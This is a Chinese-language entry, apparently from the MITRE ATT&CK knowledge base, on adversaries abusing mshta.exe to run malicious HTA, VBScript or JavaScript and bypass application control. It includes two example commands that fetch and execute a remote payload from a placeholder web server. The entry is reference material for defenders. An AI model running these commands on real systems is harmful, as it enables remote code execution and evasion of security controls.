跳转至

Mshta

对手可能会滥用 mshta.exe 通过受信任的 Windows 实用程序代理执行恶意 .hta 文件和 Javascript 或 VBScript。有几个不同类型的威胁利用 mshta.exe 在初始妥协和代码执行期间。(引用: Cylance Dust Storm) (引用: Red Canary HTA Abuse Part Deux) (引用: FireEye Attacks Leveraging HTA) (引用: Airbus Security Kovter Analysis) (引用: FireEye FIN7 April 2017) Mshta.exe 是一个执行 Microsoft HTML 应用程序 (HTA) 文件的实用程序。(引用: Wikipedia HTML Application) HTA 是独立应用程序,使用与 Internet Explorer 相同的模型和技术执行,但在浏览器之外。(引用: MSDN HTML Applications) 文件可以通过内联脚本由 mshta.exe 执行:mshta vbscript:Close(Execute("GetObject(""script:https[:]//webserver/payload[.]sct"")")) 它们也可以直接从 URL 执行:mshta http[:]//webserver/payload[.]hta Mshta.exe 可用于绕过未考虑其潜在滥用的应用程序控制解决方案。由于 mshta.exe 在 Internet Explorer 的安全上下文之外执行,它还绕过了浏览器安全设置。(引用: LOLBAS Mshta)